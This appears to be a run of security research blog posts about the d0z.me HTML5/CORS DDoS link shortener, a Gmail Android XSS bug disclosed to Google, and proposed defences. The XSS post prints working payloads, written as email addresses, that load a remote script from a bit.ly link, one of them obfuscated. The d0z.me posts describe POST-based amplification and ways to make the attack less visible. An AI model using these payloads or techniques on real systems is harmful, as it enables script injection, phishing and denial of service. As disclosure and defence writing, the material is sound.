Well, here were are, about three months since I initially released d0z.me, and I've finally gotten away from school and life for a bit this week and updated it. However, I think it was definitely worth the wait. You can grab the code over at d0z.me's new Google Code repository, and see it in action here.
Beyond making the backend code a little bit less of a disaster than it was originally, I have also made the attack itself significantly more effective. For the impatient among you, I will summarize the changes here:
- More efficient web worker implementation for making the requests.
- Some cosmetic changes that make it less obvious that an attack is occurring.
- Switched to POST requests by default, which allow us to hold server threads longer and exhaust a target's bandwidth.
- Lots of updates to the backend code.
Before I go on though, I'd like to send another big THANK YOU to Lavakumar Kuppan over at andlabs.org for his research, feedback, and suggestions. His research was what originally inspired d0z.me, and he has helped give me a few very useful suggestions on how to improve it. Go follow the andlabs blog. Also, thank you to everyone else who sent in bug reports, suggestions, etc since I released it. You rock.
Web Worker Changes
My original implementation of the HTML5 DDoS attack did its job well, but was not exactly polished. I had some ideas for speed improvements even at the time, but hadn't spent much time optimizing. As it was, it opened four webworkers, and only made one request at a time. This produced good results, but was very processor intensive for Firefox users, and wasted valuable time waiting for a response from the server at times. I also was unable to recreate the results from Lava's original presentation (although this later turned out to be a flaw in my testing procedure).
After I released d0z.me, Lava contacted me and suggested instead that I run one web worker and launch many simultaneous requests. Obviously, running multiple requests at a time is much more efficient. With some slight modifications to the pseudocode he provided (to ensure a full request queue is maintained), I was able to achieve slightly better speeds, using only two web workers instead of four.
Originally, d0z.me also implemented an attack almost identical to that of JSLOIC, meaning that an image constantly reloaded in the background. While it added a few extra requests per second, it was rather insignificant compared to its HTML5 counterpart, could only perform GET requests, and had the serious downside of displaying a progress bar in some browsers. Because of this, it has now been removed. In addition, d0z.me now attempts to pull the embedded site's favicon as it's own, so as to appear more legitimate. With these two changes, the URL becomes the only way to tell the embedded site and d0z.me apart in most browsers.
Using POST Requests for Attack Amplification
Advantages to POST Attack
One limitation of the original d0z.me implementation was that it could do little in regards to consuming bandwidth. In addition, while it was able to overwhelm servers with the sheer number of requests, server threads were not held for a very sizable amount of time. This meant that it required a decent number of users to significantly affect performance (either by consuming all available threads, crashing the database, etc). Bandwidth and thread exhaustion are both commonly used DDoS techniques, so why can't we do the same with HTML5 DDoS? Well, turns out, we can!
While the original version of d0z.me used GET requests, we can also make POST requests via CORS. Of course, we can simply issue the same number of requests/second as we can with GET, meaning that in most situations, even without a payload, the effect will be similar. However, there are a number of advantages that POST gives us that GET does not that should be obvious.
Unlike the previous version, however, attackers don't need to find large files on the host to overwhelm the hosts' bandwidth. Given that the default maximum request size is 2GB on Apache, we can send quite sizable requests safely. Most configurations do, in fact, override this default, but we can still send decently large requests regardless. To ensure that it works on most hosts, d0z.me's attack is set to use a 1MB request body. In practice, this is more than sufficient to generate excessive amounts of traffic.
Beyond the bandwidth advantages, we also tie up the server threads for a much longer amount of time, as the host must receive the request before responding. While this doesn't use a "slow POST" style attack like Slowloris, it has a similar effect: tying up processing threads that must receive the overly large requests, and thereby slowing down response times drastically.
F*ckin' CORS, How Does It Work?
So what hosts does this affect, you might ask? Just CORS enabled hosts, right? Wrong.
The CORS working draft defines a series of steps that a browser should go through when attempting to make a cross origin request. First, it should check its cache to see if it has previously connected to this URL within the cache timeout period, and if it has, whether or not cross origin requests were allowed on that URL. If it was allowed, it can go ahead and make the request; if not, the request process should stop there. If, however, the URL is not in the cache, then the draft states that the browser should make a "pre-flight request", which is essentially an empty request that seeks to get the headers for that particular URL (see OPTIONS request). The exception to this rule, however, is if the request is a "simple request", i.e. a GET, HEAD, or POST request.
I considered adding HTTP referrer / origin obfuscation support, which I previously demonstrated was possible. However, as my goal is not to make d0z.me impossible to detect and block, and I still wanted people to be able to find the site if abuse occurs, I decided against doing so. I think it is sufficient that I have warned multiple times against using that to block attacks. It's a band-aid, not a fix. I also considered adding IE support, but the attack is significantly slower without the benefit of web workers. When IE adds support for web workers, I will attempt to add support for it.
I have left GET requests in as an option, although I believe that it is usually a less effective one. However, it may be better to use such an attack if a host disallows all POST requests, or if a.) CORS is enabled on the URL and b.) responding to that request causes the host to do a significant amount of processing. The GET attack also uses significantly less memory on machines viewing the link, which might be a consideration in some instances.
As I said earlier, it's been three months since I released d0z.me. As far as I can tell, all it has achieved is a GTFO message from Dreamhost and a decent number of complaint emails. I do like to think that it has raised awareness of some of the problems with URL shortnerers and HTML5, but no browsers have attempted to limit the number of XHRs that can be made in a given time period (except *maybe* Safari?), and no changes have been made to the CORS working draft. This needs to be fixed.
While I do find a lot of the issues involved here interesting, my main reason in making this new release is to again encourage browser developers and those working on the CORS draft to fix this problem, and do it quickly. I hope it will also be useful for administrators to gauge their systems' susceptibility to these attacks, as well as to come up with defenses against them.
During a night of drinking a couple months ago, I got into a discussion with my roommate (his personal blog, cause I promised) about what characters are valid in email addresses. Although many filters only allow [a-zA-Z0-9_-] plus maybe a few more as valid characters in the local-part of the address, I was convinced that I had previously seen email addresses that used characters outside of that character set, as well as filters that allowed for a wider range of characters. As I normally do during bouts of drinking, I immediately consulted the RFC to settle the dispute (RFC 5322). Sure enough, it is apparently allowed, but discouraged, under the RFC to have an email address in the following format: "i<3whate\/er"@mydomain.com . As long as the quotation marks are present, it is technically a valid email address.
Seeing that this might trip up the ill-informed, I decided to see if Gmail handled this case correctly. I wrote up a quick test in Python and used one of the many open SMTP relays on campus (another rant for another time) to shoot an email at my Gmail account. While the main Gmail interface handled the problem with relative ease (there were some small pattern matching issues when replying), I was a little surprised to see something like the following when I opened the email on my phone:
However, this email got blocked by Gmail's spam filters. Although at first I thought that they might be aware of the vulnerability and had tried to mitigate it, it quickly became apparent that it was simply blocking all emails with "<" in the from address. Weird, but not a show stopper. To get around this, I used the fact that the XSS was present in the image tag and abused the onload attribute for execution:
Sure enough, the email got through, and when viewed, I ended up looking at Google!
" onload='var f=String.fromCharCode;var d=document;var s=d.createElement(f(83,67,82,73,80,84));s.src=f(47,47,66,73,84,46,76,89,47,105,51,51,72,100,86);d.getElementsByTagName(f(72,69,65,68)).appendChild(s);' "@somedmn.com
" onload='var d=document;var s=d.createElement("SCRIPT");s.src="//BIT.LY/i33HdV";d.getElementsByTagName("HEAD").appendChild(s);' "@somedmn.com
Of course, this is in all likelihood not the best way I could of done this, but it worked well. I'd love to see better solutions if people have them.
EDIT: Here's a much cleaner and simpler version, courtesy of R (see comments). I especially liked the use of an attribute for storing the URL string.
" title='http://bit.ly/i33HdV' onload='d=document;(s=d.createElement(/script/.source)).src=this.title;d.getElementsByTagName(/head/.source).appendChild(s)' "@somedmn.com
Probably the easiest way to exploit this vulnerability would be simply to launch a phishing attack that redirects users to a fake mobile Gmail login page, in the hopes that they will happily log in to continue viewing their emails. However, this was not a particularly interesting or creative thing to do with the vulnerability, simple though it may be.
One must also keep in mind that beyond these vulnerability-specific threats, the flaw also allowed for much easier (and quieter) exploitation of other vulnerabilities that have been found by other researchers, including the data-stealing bug and various arbitrary code execution vulnerabilities in WebKit (like this). It also allowed for the exploitation of any number of file format bugs that might have been found in the future. Exploiting any of these would be as easy as getting a user to open up an email. Worse, the user would have no idea until it was too late, as one could set the From header appropriately to make the email look legitimate (i.e., to something other than Test :P):
I found the bug on 12/3/2010, and I contacted Google about 24 hours after I discovered it and confirmed it was exploitable. I received a quick initial response, but patching of the vulnerability on the server side was not completed until 1/28/11, apparently because of decreased staffing levels over the holiday. The patch was applied server-side in the Gmail API, and works by converting the special characters into their corresponding HTML entities. The Google security people were, as in all my previous communications with them, polite and professional, and I want to thank them for addressing the issue in a reasonable timeframe.
Overall, it was a pretty interesting vulnerability, and it was a good opportunity for me to learn a little more about Android. I had a good time familiarizing myself with the platform, and hopefully I will be able to do some more interesting things with it in the future. It has also definitely made me think twice before I open emails on my phone, which is probably for the best. Hopefully once these platforms become more mature, we won't see as many of these simple but serious vulnerabilities. However, if the maturation process we've observed in other security domains is any indication, I wouldn't hold your breath. It's going to take time.
Note that the malicious nature of the link is only obvious for demonstration reasons. Simply putting a legitimate URL in front of the malicious payload would hide it from the user.
To those wondering where I've been the past month or so, I have been busy IRL getting set up at grad school among many things. As this blog is mainly to document the research and such that I am doing, the amount I post is directly related to the time I have to mess with things. I promise, updates to d0z.me soon, as well as my first Android vulnerability (yay!), and then whatever I feel like posting on after that. It's good to be back!
I'm a big believer in being up front and loud about security vulnerabilities and software bugs that are found, so I wanted to first and foremost tell anyone using the d0z.me source code to grab an updated version. I have to apologize, as I really had not expected this site to get anywhere near as popular as quickly as it did, and so I had not spent a ton of time testing it before I put in production. This is a sadly common mistake that the worst of us tend to fall into :-/ . As such, one of the regexs I was using in a sanitize routine did not function correctly, allowing for XSS and SQL injection with a specially crafted URL. The hole was patched quickly, and no significant user data was taken (as I keep none), but I wanted to make sure everyone knew in case they're putting up their own versions. Props to the person on Reddit who pointed out the flaw to me. I'm not sure who it was, as it has since been deleted, but props all the same.
Secondly, a minor bug, but a reader named Max pointed out that I had mistyped a couple characters in my charset. Should have used Python -> string.letters+string.digits, but oh well. Thanks for the report!
Now, onto happier / more interesting topics!
An oldie, but goodie. Used to fight malware all the time, this would mitigate malicious shorteners by simply by redirecting the user to a warning page by changing the DNS entry. It was interesting to see that, within a day of releasing d0z.me, it was already being blocked by OpenDNS. Impressive response time, but given that it was posted all over Slashdot and Reddit before it got blocked, I think the response time was better than it usually is.
I'm not going to spend much space discussing this one because, rather obviously, this is not a feasible technique in the long run, as it hasn't been particularly effective for malware either. Attackers can easily register domains more quickly than they're being blocked, and not all DNS providers provide such a defense for their users in the first place. However, it is a decent first line of defense on the user's end, and will at least block more popular and older malicious URL shorteners.
HTTP Referrer + mod_rewrite
Some smart people have been discussing the use of mod_rewrite (or similar) to redirect based on HTTP referrers to block these attacks (interested readers can find an excellent write-up at jaymill.net). Although it's an interesting approach that might deter the casual attacker, I see a couple big problems with this.
I took the liberty of writing up a PoC demonstrating that, using a hidden iframe, one can make attacks like d0z.me appear to have a different referrer address (spareclockcycles.org). You can view it at http://d0z.me/poc_refer.html (note: this link attacks example.com, which should be local). If you look at the requests in Wireshark, you can see that the Origin and HTTP Referrer headers are set to spareclockcycles.org and spareclockcycles.org/evil.html respectively.
This was tested with both Firefox and Chrome, and this behavior conforms with what the working draft has to say on the topic. Some browsers might be non-compliant, but the big two apparently aren't.
Secondly, while this mitigates the attack somewhat, it simply raises the bar of how many users an attacker needs to recruit through clicks on malicious links. Enough traffic will still overwhelm the server, as valid connections are still being fully established, and some level of processing still has to be done on their requests.
I believe that Jeremy mentioned both of these issues, to some degree, in his post, and seemed to believe that both were of small enough concern that it doesn't really matter. I have to respectfully disagree on that point, however. I think that yes, it raises the bar slightly for an attacker, but in the long run proves very little hindrance to one with any level of technical ability. It is certainly a good recommendation for those currently under an attack; however, I think a more solid approach is needed to dealing with this issue in the long run, and that we need to eventually address it with a complete solution rather than with temporary band-aids.
Changing Cross-Origin Requests Standards
It is clear to me that this problem is going to have to be fixed with modifications on both ends, servers and browsers alike, if we want a real fix.
This seems silly at first glance, but is actually a side-effect of the fact that different files/directories on the same site can have different cross-origin policies (i.e., you can make specific files cross-origin accessible by only adding the proper header when you respond to those requests). The browser doesn't want to cache a denial for the entire site when it's possible that some of the content could be allowed. So here is our problem: how do we remember cross origin denials for sites that have no such content, but still allow for sites to have differing policies for different sections of their site?
My first thought was to modify the standards to require any site that services cross-origin requests in any capacity to put an "Allows-Cross-Origin" header in all of their responses to cross-origin response. This way, if a browser tries to access the server once with a cross origin request and doesn't see this header, it can cache the denied response for a certain period of time before allowing any other requests to be sent, and be assured that there is no cross-origin content available on the server. This will mitigate the attack for a large portion of servers, as most have little reason to allow cross-origin requests in the first place. For those that do need to provide this service, it might be advisable for browsers to begin rate-limiting cross-origin requests, so as to minimize the potential effectiveness of this attack on those sites as well. There is no valid reason that I can think of that a browser should need to make 10,000 cross-origin requests a minute, so why let it?
This is by no means the only solution to this problem, however, and I would love to hear what other ideas people have on the matter. I very well could have overlooked a much more simple and effective fix, or missed problems with my own.
As I mentioned earlier, d0z.me was simply something I hacked together in a few hours for research purposes (and, of course, fun). This, unfortunately, led to code that is really not up to anyone's standards, including mine, as I had been more concerned with testing the attack than writing good stuff. I also did not experiment too much with the best ways to exploit the HTML5 cross-origin approach, as I was planning on doing this more later after I released the tool. I have been in discussion with the researcher who originally reported on this problem, Lavakumar Kuppan, who very kindly helped identify a number of places where my code could be improved upon.
Because of these things, I am working on releasing a more secure, reliable, and effective PoC, written for Django and the Google App Engine. The strain of keeping both spareclockcycles.org and d0z.me running has not been easy on my server, so it will be nice to get half the load into the cloud. This release will also hopefully include some significant refinements to the stealth and speed of the DoS. It will probably be delayed until after the holidays though, as I want to give concerned parties some time to come up with fixes for this issue before releasing a more potent tool, as well as give myself some time to make sure I get things right.
I know I promised @sanitybit that I would have some stats on d0z.me today, but sadly, this post has already gotten way too long, and I'd like to spend some quality time poking around with the numbers. However, quick stats: at the time of this writing, I've had ~30,000 page views (14,000 unique visitors) on the d0z.me domain and ~19,000 pageviews (16,000 unique visitors) on spareclockcycles.org since Sunday. Definitely not bad, especially for someone who is used to having visitor counts in the tens...
But yeah, welcome to all my readers! More interesting statistics are still coming, so come back soon.